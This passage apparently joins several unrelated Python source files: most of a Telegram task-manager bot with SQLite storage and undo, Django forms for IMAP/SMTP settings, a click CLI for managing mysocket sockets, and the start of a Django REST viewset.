    """Parse *text* from chat *id*, apply its commands, and return the reply HTML.

    Unknown users are registered and asked for their timezone instead.
    Any error raised while parsing/executing is returned as the reply text.
    """
    global parser
    logger.debug('get_reply started')
    if not id in db_get_users_list():
        db_add_user(id)
        return set_timezone_message
    command_list = []
    additional_message_list = []
    utc_diff_in_seconds = db_get_utc_diff_in_seconds(id)
    try:
        # One command per line; multi-line messages may only contain ADD commands.
        for line in text.split('\n'):
            command = parser.getCommand(line, utc_diff_in_seconds)
            command_list.append(command)
        check_valid_multiple_line_command(command_list)
        for command in command_list:
            execute(command, id, additional_message_list)
    except Exception as e:
        logger.error('Exception: {}'.format(str(e)))
        return str(e)
    # Materialize recurring tasks that just entered the lookahead window.
    db_add_task_recurring_n_day_only(id)
    message = generate_main_message(id, command_list[0], utc_diff_in_seconds)
    message = attach(additional_message_list, message, id, command_list[0])
    db_save()
    logger.debug('get_reply ended')
    return message
######################
# DATABASE FUNCTIONS #
######################
def db_init():
    """Create the users, tasks and tasks_recurring tables if they don't exist."""
    c.execute('CREATE TABLE IF NOT EXISTS users(id INTEGER, UTCDiffInSeconds INTEGER)')
    c.execute('CREATE TABLE IF NOT EXISTS tasks(id INTEGER, name TEXT, date INTEGER, time INTEGER, location TEXT, linkListSerial TEXT, important INTEGER, new INTEGER)')
    c.execute('CREATE TABLE IF NOT EXISTS tasks_recurring(id INTEGER, name TEXT, date INTEGER, time INTEGER, location TEXT, linkListSerial TEXT, important INTEGER, new INTEGER, recurringString TEXT, recurringInteger INTEGER)')
    conn.commit()
def db_get_users_list():
    """Return the chat ids of every registered user."""
    c.execute('SELECT id FROM users')
    return [row[0] for row in c.fetchall()]
def db_add_user(id, defaultDiffInSeconds = 28800):
    """Register a new chat id; the default offset is UTC+8 (28800 s).

    The insert is committed later via db_save().
    """
    c.execute('INSERT INTO users (id, UTCDiffInSeconds) VALUES (?,?)', (id, defaultDiffInSeconds))
def db_get_utc_diff_in_seconds(id):
    """Return the stored UTC offset (seconds) for this user."""
    c.execute('SELECT UTCDiffInSeconds FROM users WHERE id = (?)', (id,))
    # Raises IndexError if the user was never registered.
    return c.fetchall()[0][0]
def db_change_utc_diff_in_seconds(id, UTCDiffInSeconds):
    """Update the user's timezone offset and commit immediately.

    The undo snapshot is discarded because old task rows were created
    relative to the previous offset.
    """
    db_undo_clear(id)
    c.execute('UPDATE users SET UTCDiffInSeconds = (?) WHERE id = (?)', (UTCDiffInSeconds, id))
    conn.commit()
#0-id INTEGER
#1-name TEXT
#2-date INTEGER
#3-time INTEGER
#4-location TEXT
#5-linkListSerial TEXT
#6-important INTEGER
#7-new INTEGER
def db_get_tasklist(id):
    """Return the user's tasks ordered by date then time.

    Side effect: clears every task's 'new' flag, so freshly added rows are
    highlighted only once.
    """
    tasklist = []
    c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
    for row in c.fetchall():
        tasklist.append(Task(name = row[1], date = row[2], time = row[3], location = row[4], linkList = json.loads(row[5]), important = row[6], new = row[7]))
    c.execute('UPDATE tasks SET new = 0 WHERE id = (?)', (id,))
    return tasklist
#0-id INTEGER
#1-name TEXT
#2-date INTEGER
#3-time INTEGER
#4-location TEXT
#5-linkListSerial TEXT
#6-important INTEGER
#7-new INTEGER
#8-recurringString TEXT
#9-recurringInteger INTEGER
def db_get_recurring_tasklist(id):
    """Return the user's recurring task templates.

    Ordered by recurrence kind, then month (chars 5-6 of the date number)
    plus the recurrence integer, to group similar schedules together.
    """
    tasklist = []
    c.execute('SELECT * FROM tasks_recurring WHERE id = (?) ORDER BY recurringString, substr(date,5,2)||recurringInteger', (id,))
    for row in c.fetchall():
        tasklist.append(Task(name = row[1], date = row[2], time = row[3], location = row[4], linkList = json.loads(row[5]), important = row[6], new = row[7], recurringString = row[8], recurringInteger = row[9]))
    return tasklist
def db_add_task(task, id):
    """Insert a one-off task, snapshotting the current list first for UNDO."""
    db_undo_save(id)
    c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', (id, task.name, task.date, task.time, task.location, json.dumps(task.linkList), task.important, task.new))
def db_add_task_diff_date(task, id, diff_date):
    """Insert a copy of *task* on *diff_date* unless an identical row exists.

    Used when materializing recurring templates; the existence check keeps
    repeated materialization runs idempotent.
    """
    c.execute('SELECT * FROM tasks WHERE (id, name, date, time, location, linkListSerial, important) = (?,?,?,?,?,?,?)', (id, task.name, diff_date, task.time, task.location, json.dumps(task.linkList), task.important))
    if not c.fetchall():
        c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', (id, task.name, diff_date, task.time, task.location, json.dumps(task.linkList), task.important, task.new))
def db_add_task_recurring(task, id):
    """Store a recurring task template; recurring changes are not undoable."""
    db_undo_clear(id)
    c.execute('INSERT INTO tasks_recurring (id, name, date, time, location, linkListSerial, important, new, recurringString, recurringInteger) VALUES (?,?,?,?,?,?,?,?,?,?)', (id, task.name, task.date, task.time, task.location, json.dumps(task.linkList), task.important, task.new, task.recurringString, task.recurringInteger))
def db_delete_task(number_or_task, id):
    """Delete one task, addressed either by 1-based list position or by Task.

    Returns the deleted Task so callers can show a notification.
    Raises Exception with INVALID_COMMAND_INDEX when the position is out of range.
    """
    db_undo_save(id)
    if isinstance(number_or_task, int):
        # Re-run the same ORDER BY as the list view so positions line up.
        c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
        try: task_tuple = c.fetchall()[number_or_task - 1]
        except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number_or_task))
    else:
        task_tuple = (id, number_or_task.name, number_or_task.date, number_or_task.time, number_or_task.location, json.dumps(number_or_task.linkList), number_or_task.important, number_or_task.new)
    # LIMIT 1 via rowid sub-select: delete only one row even with duplicates.
    c.execute('DELETE FROM tasks WHERE rowid = (SELECT rowid FROM tasks WHERE (id, name, date, time, location, linkListSerial, important, new) = (?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
    return Task(name = task_tuple[1], date = task_tuple[2], time = task_tuple[3], location = task_tuple[4], linkList = json.loads(task_tuple[5]), important = task_tuple[6], new = task_tuple[7])
def db_delete_task_recurring(number, id):
    """Delete the *number*-th recurring template and its materialized copies.

    Raises Exception with INVALID_COMMAND_INDEX when the position is out of range.
    """
    db_undo_clear(id)
    # Same ORDER BY as the recurring list view so positions line up.
    c.execute('SELECT * FROM tasks_recurring WHERE id = (?) ORDER BY recurringString, substr(date,5,2)||recurringInteger', (id,))
    try: task_tuple = c.fetchall()[number - 1]
    except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
    c.execute('DELETE FROM tasks_recurring WHERE rowid = (SELECT rowid FROM tasks_recurring WHERE (id, name, date, time, location, linkListSerial, important, new, recurringString, recurringInteger) = (?,?,?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
    # Also drop every materialized instance: match on all columns except
    # date/new/recurring fields (task_tuple[:2] + task_tuple[3:-3]).
    c.execute('DELETE FROM tasks WHERE (id, name, time, location, linkListSerial, important) = (?,?,?,?,?,?)', task_tuple[:2] + task_tuple[3:-3])
def db_get_task(number, id):
    """Return the *number*-th (1-based, list order) task without deleting it.

    Raises Exception with INVALID_COMMAND_INDEX when the position is out of range.
    """
    c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
    try: task_tuple = c.fetchall()[number - 1]
    except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
    return Task(name = task_tuple[1], date = task_tuple[2], time = task_tuple[3], location = task_tuple[4], linkList = json.loads(task_tuple[5]), important = task_tuple[6], new = task_tuple[7])
def db_append_task(number, id, append_task):
    """Merge *append_task*'s name/location/links into the *number*-th task.

    The target row is deleted and re-inserted with the merged fields; its
    date, time and importance are preserved and its 'new' flag is set so the
    list view highlights it.
    Raises Exception with INVALID_COMMAND_INDEX when the position is out of range.
    """
    db_undo_save(id)
    c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
    try: task_tuple = c.fetchall()[number - 1]
    except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
    c.execute('DELETE FROM tasks WHERE rowid = (SELECT rowid FROM tasks WHERE (id, name, date, time, location, linkListSerial, important, new) = (?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
    new_name = task_tuple[1]
    new_location = task_tuple[4]
    new_linkList = json.loads(task_tuple[5])
    if append_task.name: new_name = '{}, {}'.format(new_name, append_task.name)
    if append_task.location: new_location = '{}/{}'.format(new_location, append_task.location)
    if append_task.linkList: new_linkList = new_linkList + append_task.linkList
    new_new = 1
    # BUGFIX: the 'important' column must come from task_tuple[6]; the old
    # code passed task_tuple[7] (the previous 'new' flag), silently
    # corrupting the importance marker on every append.
    new_task_tuple = (id, new_name, task_tuple[2], task_tuple[3], new_location, json.dumps(new_linkList), task_tuple[6], new_new)
    c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', new_task_tuple)
def db_append_task_with_another_tasks(id, numberList):
    """Merge task numberList[1] into task numberList[0], then delete the source."""
    db_undo_save(id)
    append_task = db_get_task(numberList[1], id)
    db_append_task(numberList[0], id, append_task)
    # Delete by Task object, not position: positions shifted after the merge.
    db_delete_task(append_task, id)
def db_edit_task(number, id, edit_task):
    """Overwrite fields of the *number*-th task with those set on *edit_task*.

    Sentinel values mean "leave unchanged": name '', date 0, time -1,
    location '', empty linkList, important 0. The row is re-inserted with
    its 'new' flag set so the list view highlights it.
    Raises Exception with INVALID_COMMAND_INDEX when the position is out of range.
    """
    db_undo_save(id)
    c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
    try: task_tuple = c.fetchall()[number - 1]
    except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
    c.execute('DELETE FROM tasks WHERE rowid = (SELECT rowid FROM tasks WHERE (id, name, date, time, location, linkListSerial, important, new) = (?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
    task_listed = list(task_tuple)
    if edit_task.name: task_listed[1] = edit_task.name
    if edit_task.date != 0: task_listed[2] = edit_task.date
    if edit_task.time != -1: task_listed[3] = edit_task.time
    if edit_task.location != '': task_listed[4] = edit_task.location
    if edit_task.linkList: task_listed[5] = json.dumps(edit_task.linkList)
    if edit_task.important != 0: task_listed[6] = edit_task.important
    task_listed[7] = 1
    c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', tuple(task_listed))
def db_add_task_recurring_next_n_days(id, task, n = 14):
    """Materialize a recurring template for every matching day in the next n days.

    Matching rules: 'every_year' needs month+day to match, 'every_month'
    needs the day of month, and 'every_<weekday>' needs the weekday name.
    """
    utc_diff_in_seconds = db_get_utc_diff_in_seconds(id)
    current_time_delta = Chrono.getCurrentTimeDelta(utc_diff_in_seconds)
    for i in range(n + 1):
        target_time_delta = current_time_delta + datetime.timedelta(days = i)
        target_date_number = chrono.getDateNumberFromTimeDelta(target_time_delta)
        month_number = int(target_time_delta.strftime('%m'))
        day_of_month_number = int(target_time_delta.strftime('%d'))
        day_of_week_string = target_time_delta.strftime('%a').lower()
        # task.date // 100 % 100 extracts the month from the YYYYMMDD number.
        if task.recurringString == 'every_year' and task.recurringInteger == day_of_month_number and (task.date // 100 % 100) == month_number: db_add_task_diff_date(task, id, target_date_number)
        elif task.recurringString == 'every_month' and task.recurringInteger == day_of_month_number: db_add_task_diff_date(task, id, target_date_number)
        elif task.recurringString[6:] == day_of_week_string: db_add_task_diff_date(task, id, target_date_number)
def db_add_task_recurring_n_day_only(id, n = 14):
    """Materialize all recurring templates for exactly day +n (horizon edge).

    Called on every reply so the day that just entered the n-day lookahead
    window gets its recurring tasks; earlier days were filled on previous calls.
    """
    utc_diff_in_seconds = db_get_utc_diff_in_seconds(id)
    current_time_delta = Chrono.getCurrentTimeDelta(utc_diff_in_seconds)
    recurring_tasklist = db_get_recurring_tasklist(id)
    i = n
    target_time_delta = current_time_delta + datetime.timedelta(days = i)
    target_date_number = chrono.getDateNumberFromTimeDelta(target_time_delta)
    month_number = int(target_time_delta.strftime('%m'))
    day_of_month_number = int(target_time_delta.strftime('%d'))
    day_of_week_string = target_time_delta.strftime('%a').lower()
    for task in recurring_tasklist:
        # Same matching rules as db_add_task_recurring_next_n_days().
        if task.recurringString == 'every_year' and task.recurringInteger == day_of_month_number and (task.date // 100 % 100) == month_number: db_add_task_diff_date(task, id, target_date_number)
        elif task.recurringString == 'every_month' and task.recurringInteger == day_of_month_number: db_add_task_diff_date(task, id, target_date_number)
        elif task.recurringString[6:] == day_of_week_string: db_add_task_diff_date(task, id, target_date_number)
def db_undo(id):
    """Restore the single-level undo snapshot stored under id + 1000000000.

    Raises Exception with INVALID_COMMAND_UNDO when no snapshot exists.
    """
    c.execute('SELECT * FROM tasks WHERE id = (?)', (id + 1000000000,))
    if not c.fetchall(): raise Exception(INVALID_COMMAND_UNDO)
    # Replace the live rows with the snapshot rows.
    c.execute('DELETE FROM tasks WHERE id = (?)', (id,))
    c.execute('UPDATE tasks SET id = (?) WHERE id = (?)', (id, id + 1000000000))
def db_undo_save(id):
    """Snapshot the user's current tasks for UNDO (single level).

    The snapshot lives in the same table under the shadow id
    id + 1000000000; any previous snapshot is replaced.
    """
    # delete previous undo save
    c.execute('DELETE FROM tasks WHERE id = (?)', (id + 1000000000,))
    # copy current tasks under modified id
    c.execute('INSERT INTO tasks SELECT (id + 1000000000) AS id, name, date, time, location, linkListSerial, important, new FROM tasks WHERE id = (?)', (id,))
def db_undo_clear(id):
    """Drop the user's undo snapshot (used when an operation is not undoable)."""
    c.execute('DELETE FROM tasks WHERE id = (?)', (id + 1000000000,))
def db_save():
    """Commit all pending database changes."""
    conn.commit()
####################
# HELPER FUNCTIONS #
####################
def get_bot(api_token):
    """Create a telegram.Bot, retrying every 2 s until the network cooperates.

    Raises ValueError immediately when the placeholder token was never replaced
    (the old code used `assert`, which is stripped under `python -O`).
    """
    if api_token == 'insert_your_api_token_here':
        raise ValueError('Please add your Telegram Bot api token into run.py')
    while True:
        try:
            print('Trying to get_bot...')
            return telegram.Bot(api_token)
        except socket.timeout:
            # Transient network hiccup: wait and retry quietly.
            sleep(2)
        except Exception as e:
            # Lazy %-formatting — the old call logger.error('exception', str(e))
            # passed an argument without a placeholder, which logging rejects.
            logger.error('exception: %s', e)
            sleep(2)
def get_update_id(bot):
    """Return the id of the first pending update, or None when none are queued."""
    pending = bot.get_updates()
    if pending:
        return pending[0].update_id
    return None
def send(message, id, bot):
    """Send *message* (HTML) to chat *id*, showing a typing indicator first."""
    bot.send_chat_action(chat_id=id, action=telegram.ChatAction.TYPING)
    # Web-page previews are disabled so task links don't expand in chat.
    bot.send_message(chat_id=id, text=message, parse_mode=telegram.ParseMode.HTML, disable_web_page_preview=1)
def check_valid_multiple_line_command(command_list):
    """Raise unless a multi-line message consists only of ADD/ADD_RECUR commands.

    Single-command messages always pass.
    """
    if len(command_list) < 2:
        return
    for cmd in command_list:
        if cmd.commandType not in ('ADD', 'ADD_RECUR'):
            raise Exception(INVALID_COMMAND_MULTI.format(cmd.commandType))
def execute(command, id, messageList):
    """Apply a single parsed command for user *id*.

    User-visible notifications (deletions, timezone confirmation) are appended
    to *messageList*; invalid commands raise Exception carrying the help text.
    (Leftover debug print() calls in the APPEND branch were removed.)
    """
    logger.debug('execute started')
    commandType = command.commandType
    numberList = command.numberList
    if commandType in COMMAND_LIST_PASS: pass  # display-only commands mutate nothing
    elif commandType == 'ADD': db_add_task(command.task, id)
    elif commandType == 'DEL':
        for number in numberList:
            deletedTask = db_delete_task(number, id)
            messageList.append(NOTIFICATION_DEL.format(deletedTask.getName()))
    elif commandType == 'ADD_RECUR':
        db_add_task_recurring(command.task, id)
        db_add_task_recurring_next_n_days(id, command.task)
    elif commandType == 'DEL_RECUR': db_delete_task_recurring(numberList[0], id)
    elif commandType == 'APPEND':
        if not command.task.name and not command.task.location and not command.task.linkList: raise Exception(INVALID_COMMAND_APPEND)
        else:
            # Two numbers with a single-word name presumably means
            # "merge task B into task A" — confirm against the parser.
            if len(numberList) > 1 and len(command.task.name.split()) == 1: db_append_task_with_another_tasks(id, numberList)
            else: db_append_task(numberList[0], id, command.task)
    elif commandType == 'SEARCH': pass
    elif commandType == 'UNDO': db_undo(id)
    elif commandType == 'EDIT': db_edit_task(numberList[0], id, command.task)
    elif commandType == 'MYTIME':
        if command.task.time == -1 or command.task.date == 0: raise Exception(INVALID_COMMAND_MYTIME)
        else:
            UTCDiffInSeconds = chrono.getUTCDiffInSeconds(command.task.time, command.task.date)
            db_change_utc_diff_in_seconds(id, UTCDiffInSeconds)
            messageList.append(NOTIFICATION_MYTIME)
    elif commandType == 'CLEAR': raise Exception('Clear command coming soon!')
    elif commandType == 'REDO': raise Exception('Redo command coming soon!')
    else: raise Exception(INVALID_COMMAND_GENERAL)
    logger.debug('execute ended')
def generate_main_message(id, command, UTCDiffInSeconds):
    """Render the reply body for *command*: a search result, the recurring
    list, a help/start message, or the (possibly trimmed) task list with
    'today' and 'end of week' separator bars.

    Note: the string is built oldest-first and reversed at the end, so the
    newest entries appear at the bottom of the chat bubble.
    """
    logger.debug('Generate tasklist_string started')
    tasklist_string = ''
    search_mode = 0
    search_found = 0
    search_task = command.task
    full_list_mode = 0
    recur_list_mode = 0
    today_bar_exists = 0
    end_of_week_bar_exists = 0
    end_of_week_bar_needed = 0
    if command.commandType == 'SEARCH': search_mode = 1
    elif command.commandType == 'HELP': return welcome_message_string
    elif command.commandType == 'START': return set_timezone_message
    elif command.commandType == 'LIST_FULL': full_list_mode = 1
    elif command.commandType in recurring_list_commands: recur_list_mode = 1
    if search_mode:
        tasklist = db_get_tasklist(id)
        for i, task in enumerate(tasklist):
            if task_match(task, search_task):
                search_found = 1
                tasklist_string = '{}<b>{}</b>. {} {}{}{}{}{}\n'.format(tasklist_string, str(i + 1), chrono.getNiceDate(task.date, UTCDiffInSeconds), task.getTime(), bold_term(task.getName(), search_task.name), task.getLocation(), get_link_string(task.linkList, 'full'), task.getImportant())
        if not search_found:
            tasklist_string = '{}No entries match your search :(\n'.format(tasklist_string)
    elif recur_list_mode:
        recurringtasklist = db_get_recurring_tasklist(id)
        if not len(recurringtasklist): return 'No recurring tasks added yet!\n'
        for i, task in enumerate(recurringtasklist):
            tasklist_string = '{}<b>{}</b>. {}{} (<b>{}</b>)/Del_R{}\n'.format(tasklist_string, i + 1, task.name, task.getImportant(), get_nice_recurring_date(task), i + 1)
    else:
        tasklist = db_get_tasklist(id)
        if not len(tasklist): return empty_tasklist_string
        todayDelta = chrono.getCurrentTimeDelta(UTCDiffInSeconds)
        todayDateNumber = chrono.getDateNumberFromTimeDelta(todayDelta)
        mondayDateNumber = chrono.getDateNumberNDaysFromMonday(0, UTCDiffInSeconds)
        sundayDateNumber = chrono.getDateNumberNDaysFromMonday(6, UTCDiffInSeconds)
        for i, task in enumerate(tasklist):
            # Insert Today bar
            # Tasks past the display limit are still shown when flagged 'new'.
            if (i+1 <= TASK_NUMBER_LIMIT or full_list_mode) or task.new:
                if not today_bar_exists and task.date > todayDateNumber:
                    today_bar_exists = 1
                    tasklist_string = '{}<b>***({}) {} {}, {} hrs***</b>\n'.format(tasklist_string,
                                                                                  todayDelta.strftime('%a'), # Mon, Tue
                                                                                  todayDelta.strftime('%d'), # 1-30
                                                                                  todayDelta.strftime('%b'), # Jan, Feb
                                                                                  todayDelta.strftime("%H:%M")) # 14:35
                # Insert End of week bar
                if end_of_week_bar_exists:
                    pass
                elif not end_of_week_bar_exists and task.date > mondayDateNumber and task.date <= sundayDateNumber:
                    end_of_week_bar_needed = 1
                elif end_of_week_bar_needed and task.date > sundayDateNumber:
                    tasklist_string = '{}----------<i>End of Week</i>----------\n'.format(tasklist_string)
                    end_of_week_bar_exists = 1
                tasklist_string = '{}<b>{}</b>.{}{} {}{}{}{}\n'.format(tasklist_string,
                                                                       str(i + 1),
                                                                       chrono.getNiceDate(task.date, UTCDiffInSeconds),
                                                                       task.getTime(),
                                                                       task.getName(),
                                                                       task.getLocation(),
                                                                       get_link_string(task.linkList),
                                                                       task.getImportant())
            # Trim list if not full_list_mode
            if i+1 == TASK_NUMBER_LIMIT and not full_list_mode:
                tasklist_string = '{}<b>{}</b>. ... [/show_all]\n'.format(tasklist_string, str(i+2))
    tasklist_string = reverse_order(tasklist_string)
    logger.debug('Generate tasklist_string ended')
    return tasklist_string
def task_match(task, search_task):
    """Return 1 when search_task's text (and date, if set) matches *task*, else 0."""
    # Leading-space padding restricts matches to word starts.
    haystack = ' {}'.format(task.name.lower())
    needle = ' {}'.format(search_task.name.lower())
    if needle not in haystack:
        return 0
    if search_task.date and task.date != search_task.date:
        return 0
    return 1
def reverse_order(message):
    """Return *message* with its lines in reverse order."""
    return '\n'.join(reversed(message.split('\n')))
def get_link_string(linkList, type = 'shortened'):
    """Render a task's links: compact anchor tags when shortened, raw URLs otherwise."""
    if not linkList:
        return ''
    if type == 'shortened':
        return ''.join('(<a href="{}">{}</a>)'.format(url, trim_link(url)) for url in linkList)
    return ''.join(' {} '.format(url) for url in linkList)
def trim_link(link):
    """Compress a URL into a 4-character display stub followed by '...'.

    Protocol and 'www.' prefixes are stripped first; an empty remainder
    yields 'invalid_link'.
    """
    if link.startswith('https'):
        remainder = link[8:]   # drop 'https://'
    elif link.startswith('http'):
        remainder = link[7:]   # drop 'http://'
    else:
        remainder = link
    if remainder.startswith('www.'):
        remainder = remainder[4:]
    if not remainder:
        return 'invalid_link'
    return remainder[:4] + '...'
def get_nice_recurring_date(task):
    """Human-readable description of a recurring task's schedule.

    'every_year' delegates to chrono; 'every_month' yields e.g. 'Every 2nd';
    anything else (e.g. 'every_mon') is title-cased: 'Every Mon'.
    """
    if task.recurringString == 'every_year':
        return 'Every {}'.format(chrono.getNiceRecurringDate(task.date, task.recurringInteger))
    elif task.recurringString == 'every_month':
        # BUGFIX: the old chain only special-cased 1/2/3, producing
        # 'Every 21th', 'Every 22th', 'Every 23th' and 'Every 31th'.
        return 'Every {}'.format(_ordinal(task.recurringInteger))
    else:
        return task.recurringString.replace('_',' ').title()

def _ordinal(n):
    """Return n with its English ordinal suffix (1st, 2nd, 3rd, 4th, ..., 21st)."""
    if 10 <= n % 100 <= 20:
        suffix = 'th'
    else:
        suffix = {1: 'st', 2: 'nd', 3: 'rd'}.get(n % 10, 'th')
    return '{}{}'.format(n, suffix)
def attach(messageList, message, id, command):
    """Append notification lines (behind a '-----' rule) and the footer
    shortcut links to the reply message."""
    if messageList:
        message = '\n'.join([message, '-----'] + list(messageList))
    return '{}\n[/refresh] [/recurring_tasks]'.format(message)
def get_date_string():
    """Today's date in Singapore time (UTC+8) as a 'YYYYMMDD' string."""
    singapore_now = datetime.datetime.now() + datetime.timedelta(seconds=28800)
    return singapore_now.strftime('%Y%m%d')
def bold_term(string, search_term):
    """Wrap the first word-start occurrence of search_term in <b> tags,
    preserving the original casing; return string unchanged on no match."""
    # A space is prepended to both sides so the term only matches at a word
    # start; the match index in the padded string is then exactly the term's
    # start index in the unpadded string.
    start = ' {}'.format(string.lower()).find(' {}'.format(search_term.lower()))
    print('"{}" found in "{}" at position {}'.format(search_term, string, start))
    if start < 0:
        return string
    end = start + len(search_term)
    return '{}<b>{}</b>{}'.format(string[:start], string[start:end], string[end:])
################
# LONG STRINGS #
################
# Prompt shown to new users until they set their timezone.
# (Fixed user-facing typo: 'Currrent' -> 'Current'.)
set_timezone_message = """Hi New User! Set your Timezone first by sharing your current time with me!
<b>Type:</b> mytime [Your Current Time and Date]
<b>e.g.</b> mytime 11am 25may
<b>e.g.</b> mytime 1125am 25may
<b>e.g.</b> mytime 1pm 25may
<b>e.g.</b> mytime 130pm 25may"""
# Full command reference shown to users (e.g. via /help).
welcome_message_string = """Welcome to DoMe Task Manager!
<i>Just type in a command! (No "/" needed.)</i>
<b>1) Adding Tasks</b> [Optional Arguments]
eg. <i>Go swimming at pool tmr 8am</i>
<b>Syntax:</b> Task_Name [date][time][location][link][!]
<b>Acceptable Formats</b> (not case-sensitive)
Date: <i>17apr, 17 apr, 17 april, 17 april 2003</i>
Time: <i>7pm, 745pm, 11am</i>
Location: <i>at ang mo kio, @ang_mo_kio</i>
Link: <i>http..., www...</i>
<b>2) Deleting Tasks</b>
eg. delete 10 / d 10 / d10
eg. d 3 1 6 2
<b>3) Refresh Current Tasks</b>
eg. refresh / ref / list / ls
<b>4) Edit Tasks</b>
eg. edit 3 <i>something new</i>
eg. e 12 <i>19 feb</i>
eg. e 15 <i>something new 19 feb</i>
<b>5) Append</b>
eg. append 5 more_info at location2
eg. app 5 more_info at LOC_2
<b>Result:</b> Task, <i>more_info @LOC_1/LOC_2</i>
<b>6) Change Timezone</b>
eg. mytime 1125pm 25may
<b>7) Search</b>
eg. s things to buy
<b>8) Undo</b> (Only 1 undo supported)
eg. undo, u
"""
# Placeholder shown when the user's task list is empty.
empty_tasklist_string = """- List is empty! -
Just type a task and send!
For example: <b>Buy a goat 17 dec</b>.
See /help for more options."""
#####################
# RUN MAIN FUNCTION #
#####################
if __name__ == '__main__':
main() |
#from django.forms import ModelForm, fields
from django import forms
from person.models import ImapServer, SmtpServer
class ImapServerForm(forms.ModelForm):
    """ModelForm for editing an ImapServer, masking the password input."""

    class Meta:
        model = ImapServer
        # Modern Django requires an explicit field list on ModelForms;
        # '__all__' preserves the historical "all model fields" behaviour.
        fields = '__all__'
        widgets = {
            'passwd': forms.PasswordInput(),
        }
class SmtpServerForm(forms.ModelForm):
    """ModelForm for editing an SmtpServer, masking the password input."""

    class Meta:
        model = SmtpServer
        # Modern Django requires an explicit field list on ModelForms;
        # '__all__' preserves the historical "all model fields" behaviour.
        fields = '__all__'
        widgets = {
            'passwd': forms.PasswordInput(),
        }
|
import click
from mysocketctl.utils import *
@click.group()
def socket():
    """Manage your global sockets"""
    # click command group; subcommands (ls / create / delete) register
    # themselves below via @socket.command(). The docstring above is the
    # CLI help text, so it is kept verbatim.
    pass
def get_sockets(authorization_header):
    """Fetch every socket for this account and return the parsed JSON."""
    response = requests.get(api_url + "connect", headers=authorization_header)
    validate_response(response)
    return response.json()
def new_socket(
    authorization_header,
    connect_name,
    protected_socket,
    protected_user,
    protected_pass,
    socket_type,
):
    """Create a new socket via the API and return the parsed JSON response.

    :param authorization_header: auth headers dict for the API request
    :param connect_name: display name for the new socket
    :param protected_socket: truthy to password-protect the socket
    :param protected_user: username for a protected socket
    :param protected_pass: password for a protected socket
    :param socket_type: one of http, https, tcp, tls
    """
    params = {
        "name": connect_name,
        # normalize any truthy/falsy value into a real boolean for the API
        # (replaces the original if/else reassignment dance)
        "protected_socket": bool(protected_socket),
        "protected_username": protected_user,
        "protected_password": protected_pass,
        "socket_type": socket_type,
    }
    api_answer = requests.post(
        api_url + "socket", data=json.dumps(params), headers=authorization_header
    )
    validate_response(api_answer)
    return api_answer.json()
def delete_socket(authorization_header, socket_id):
    """Delete the socket with the given ID; return the raw API response."""
    response = requests.delete(
        api_url + "socket/" + socket_id, headers=authorization_header
    )
    validate_response(response)
    return response
@socket.command()
def ls():
    """List your sockets."""
    table = PrettyTable(
        field_names=["socket_id", "dns_name", "type", "port(s)", "name"]
    )
    table.align = "l"
    table.border = True
    authorization_header = get_auth_header()
    # loop variable renamed from 'socket' (shadowed the click group) and the
    # stray chained 'listToStr' assignment removed
    for sock in get_sockets(authorization_header):
        # render the TCP port list as one space-separated column
        ports_str = " ".join(str(port) for port in sock["socket_tcp_ports"])
        table.add_row([
            sock["socket_id"],
            sock["dnsname"],
            sock["socket_type"],
            ports_str,
            sock["name"],
        ])
    print(table)
@socket.command()
@click.option("--name", required=True, type=str)
@click.option("--protected/--not-protected", default=False)
@click.option("--username", required=False, type=str, default="")
@click.option("--password", required=False, type=str, default="")
@click.option(
    "--type",
    required=False,
    type=str,
    default="http",
    help="Socket type, http, https, tcp, tls",
)
def create(name, protected, username, password, type):
    """Create a new socket."""
    # NOTE: '--protected' was previously declared twice (once as a str option
    # and once as a boolean flag); only the boolean flag is kept.
    if protected:
        if not username:
            print("--username required when using --protected")
            sys.exit(1)
        if not password:
            print("--password required when using --protected")
            sys.exit(1)
    if type not in ["http", "https", "tcp", "tls"]:
        print("--type should be either http, https, tcp or tls")
        sys.exit(1)
    authorization_header = get_auth_header()
    socket = new_socket(
        authorization_header, name, protected, str(username), str(password), str(type)
    )
    table = PrettyTable()
    table.align = "l"
    table.border = True
    # The original tcp/tls and http/https branches built identical rows, so a
    # single row construction now serves all socket types.
    ports_str = " ".join(str(port) for port in socket["socket_tcp_ports"])
    table.field_names = ["socket_id", "dns_name", "port(s)", "type", "name"]
    table.add_row([
        socket["socket_id"],
        socket["dnsname"],
        ports_str,
        socket["socket_type"],
        socket["name"],
    ])
    print(table)
    if protected:
        protectedtable = PrettyTable(field_names=["username", "password"])
        protectedtable.align = "l"
        protectedtable.border = True
        protectedtable.add_row([str(username), str(password)])
        print("\nProtected Socket, login details:")
        print(protectedtable)
@socket.command()
@click.option("--socket_id", required=True, type=str)
def delete(socket_id):
    # remove the socket via the API, then confirm to the user
    auth_header = get_auth_header()
    delete_socket(auth_header, socket_id)
    print("Socket " + socket_id + " deleted")
|
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from .models import Project, Risk
from .serializers import (ProjectSerializer,
ProjectSerializerForUpdateRequests, RiskSerializer,
RiskSerializerForUpdateRequests)
class ProjectView(ModelViewSet):
    """
    Viewset responsible for presenting Project models data
    """
    serializer_class = ProjectSerializer
    queryset = Project.objects.all()
    permission_classes = [IsAuthenticated]
